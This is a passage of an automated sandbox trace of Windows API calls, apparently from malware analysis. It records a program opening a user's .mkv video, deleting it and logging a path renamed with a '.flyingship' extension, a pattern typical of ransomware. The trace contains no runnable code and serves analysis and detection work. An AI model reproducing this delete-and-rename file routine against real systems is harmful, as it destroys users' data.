HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0196.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0196.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0196.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0196.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0196.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0196.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0196.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0196.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0196.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0196.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0196.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0196.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0196.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0196.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0196.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0196.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.888] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.888] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.888] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.888] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0196.888] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.888] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.888] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.888] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.889] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.889] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.889] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.889] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.889] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.889] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.889] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.889] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.914] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.914] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.914] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.914] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.914] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0196.915] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0196.916] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\_4x_cnshky.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0196.916] FreeLibrary (hLibModule=0x75990000) returned 1 [0196.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.916] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.916] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0196.916] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.916] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.916] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0196.917] FreeLibrary (hLibModule=0x75990000) returned 1 [0196.917] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.917] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.917] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.917] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.917] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0196.917] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.917] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.917] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0196.918] FreeLibrary (hLibModule=0x75990000) returned 1 [0196.918] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.918] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.918] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv", lpFilePart=0x0) returned 0x55 [0196.918] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e1d08a0, ftCreationTime.dwHighDateTime=0x1d5e2cf, ftLastAccessTime.dwLowDateTime=0x7b3a1a70, ftLastAccessTime.dwHighDateTime=0x1d5da72, ftLastWriteTime.dwLowDateTime=0x1a4851e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4953, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="_4X_CNShky.mkv", cAlternateFileName="_4X_CN~1.MKV")) returned 0x90ae18 [0196.918] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\_4x_cnshky.mkv")) returned 1 [0196.922] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e1d08a0, ftCreationTime.dwHighDateTime=0x1d5e2cf, ftLastAccessTime.dwLowDateTime=0x7b3a1a70, ftLastAccessTime.dwHighDateTime=0x1d5da72, ftLastWriteTime.dwLowDateTime=0x1a4851e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4953, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="_4X_CNShky.mkv", cAlternateFileName="_4X_CN~1.MKV")) returned 0 [0196.922] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0196.923] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0196.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0196.924] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0196.924] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.924] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0196.924] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.924] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0196.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0196.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0196.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0196.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0196.924] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0196.924] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3844, lpOverlapped=0x0) returned 1 [0196.925] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0196.925] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x3844, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.925] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0196.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0196.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0196.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0196.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0196.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.flyingship.mkv\r\n", cchWideChar=99, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 99 [0196.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x63) returned 0x8e8320 [0196.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.flyingship.mkv\r\n", cchWideChar=99, lpMultiByteStr=0x8e8320, cbMultiByte=99, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.flyingship.mkv\r\n", lpUsedDefaultChar=0x0) returned 99 [0196.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0196.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0196.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0196.926] WriteFile (in: hFile=0x160, lpBuffer=0x906f38*, nNumberOfBytesToWrite=0x62, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x906f38*, lpNumberOfBytesWritten=0x87f43c*=0x62, lpOverlapped=0x0) returned 1 [0196.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0196.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0196.926] CloseHandle (hObject=0x160) returned 1 [0196.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0196.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0196.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0196.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0196.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0196.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0196.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0196.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0196.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0196.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0196.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0196.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0196.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0196.928] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0196.928] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0196.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0196.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0196.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0196.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0196.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0196.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0196.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0196.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0196.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0196.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0196.930] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0196.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0196.930] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0196.930] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0196.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0196.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0196.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0196.930] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0196.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0196.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0196.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0196.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ad0 [0196.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0196.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0196.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0196.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0196.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0196.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0196.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0196.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9c70 [0196.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0196.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0196.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0196.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0196.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0196.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0196.931] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0196.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) 